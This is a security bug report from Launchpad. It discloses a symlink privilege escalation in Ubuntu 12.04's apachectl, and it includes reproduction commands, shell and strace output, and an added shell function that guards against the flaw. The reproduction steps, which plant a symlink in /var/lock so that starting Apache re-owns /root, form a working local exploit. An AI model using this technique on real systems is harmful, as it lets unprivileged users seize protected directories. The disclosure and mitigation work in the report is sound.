*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
Dear all,
The /usr/sbin/apachectl script allows unprivileged local users to change
the permissions of any directory to 0755 and in addition make the user
www-data its owner.
The script has a line:
start)
...
install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
Since in Ubuntu the /var/lock directory has world-writable permissions, a user
can create a symbolic link to any directory. An administrator then starts
Apache through /etc/init.d/apache2, which in turn calls the script
/usr/sbin/apachectl which will change the permissions of the directory pointed
to by the symbolic link to 0755 and in addition, make the user www-data its
owner.
Details:
=====
root@u32d:~# apt-cache policy apache2.2-common
apache2.2-common:
Installed: 2.2.22-1ubuntu1
Candidate: 2.2.22-1ubuntu1.2
Version table:
2.2.22-1ubuntu1.2 0
500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main i386
Packages
500 http://security.ubuntu.com/ubuntu/ precise-security/main i386
Packages
*** 2.2.22-1ubuntu1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386 Packages
100 /var/lib/dpkg/status
root@u32d:~# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04
Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable to
Quantal 12.10):
As an untrusted user, create a symbolic link in /var/lock to a directory to
which the user does not have read/search permission (e.g., /root):
hayawardh@u32d:~$ ls -ld /root
drwx------. 14 root root 4096 Jan 24 08:23 /root
hayawardh@u32d:~$ cd /var/lock
hayawardh@u32d:/var/lock$ ln -s /root apache2
Wait for the administrator to start Apache:
root@u32d:~# /etc/init.d/apache2 start
* Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name,
using 127.0.1.1 for ServerName
...done.
Now check permissions of /root:
root@u32d:~# ls -ld /root
drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
Fixing this does not seem straightforward because install opens the file
to change permissions (in this case, /var/lock/apache2) without
O_NOFOLLOW, and there does not seem to be a command line switch for the
same.
Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}:
mkdir("/var", 0755) = -1 EEXIST (File exists)
chdir("/var") = 0
mkdir("lock", 0755) = -1 EEXIST (File exists)
chdir("lock") = 0
mkdir("apache2", 0700) = -1 EEXIST (File exists)
open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
fchown32(3, 33, -1) = 0
fchmod(3, 0755) = 0
close(3) = 0
Thanks,
Hayawardh
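The report notes that install(1) performs its chown/chmod through an open(2) without O_NOFOLLOW, so any symlink an unprivileged user plants at the lock-directory name is followed. The following is an added example, not the reporter's code and not the fix Debian or Ubuntu shipped: a POSIX shell function that creates the run-time directory while refusing to operate on a planted symlink. It relies on two properties the report itself exercises: mkdir(2) never follows a symlink in its final path component (it fails with EEXIST instead), and under a sticky, world-writable parent such as /var/lock an entry owned by the privileged caller cannot be renamed or unlinked by other users, so a directory the caller just created cannot be swapped out before the chown/chmod. The function name safe_run_dir, the owner argument, and the use of GNU stat for the uid check are assumptions of this example.

```shell
#!/bin/sh
# Added example (not part of the bug report or of the apache2 packaging):
# create a run-time directory under a world-writable, sticky parent without
# following a symbolic link that another user may have placed at that name.
#
# Assumptions (constructed for this example): the caller (root, when run
# from the init script) is the uid that should own any pre-existing entry;
# the desired final owner is passed as $2; GNU stat provides "-c %u".

safe_run_dir() {
    dir=$1
    owner=${2:-www-data}

    # mkdir(2) does not follow a symlink in its final component: a planted
    # symlink makes it fail with EEXIST, and on success the entry is ours.
    # Under a sticky parent other users cannot rename or unlink our entry,
    # so the chown below cannot be redirected to a different directory.
    if mkdir -m 0755 "$dir" 2>/dev/null; then
        chown "$owner" "$dir" && return 0
        return 1
    fi

    # Something already sits at that name. Refuse symlinks outright, since
    # chown/chmod by path would follow them (this is the reported bug).
    if [ -L "$dir" ]; then
        echo "refusing to use $dir: it is a symbolic link" >&2
        return 1
    fi
    # Also refuse anything that is not a directory owned by the caller:
    # only entries we created ourselves are safe to modify by path.
    if [ ! -d "$dir" ] || [ "$(stat -c %u "$dir")" != "$(id -u)" ]; then
        echo "refusing to use $dir: not a directory owned by uid $(id -u)" >&2
        return 1
    fi
    chown "$owner" "$dir" && chmod 0755 "$dir"
}
```

In the init script this would replace the install -d line, e.g. `safe_run_dir "${APACHE_LOCK_DIR:-/var/lock/apache2}" "${APACHE_RUN_USER:-www-data}" || exit 1`; with the symlink from the report in place, the start fails loudly instead of silently re-owning /root. The remaining gap is a pre-existing directory that the caller owns but that was chmod'ed or repurposed earlier; the function treats that as safe because no other user can have created it.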
** Affects: apache2 (Ubuntu)
Importance: Undecided
Status: Confirmed
--
/usr/sbin/apachectl privilege escalation
https://bugs.launchpad.net/bugs/1104049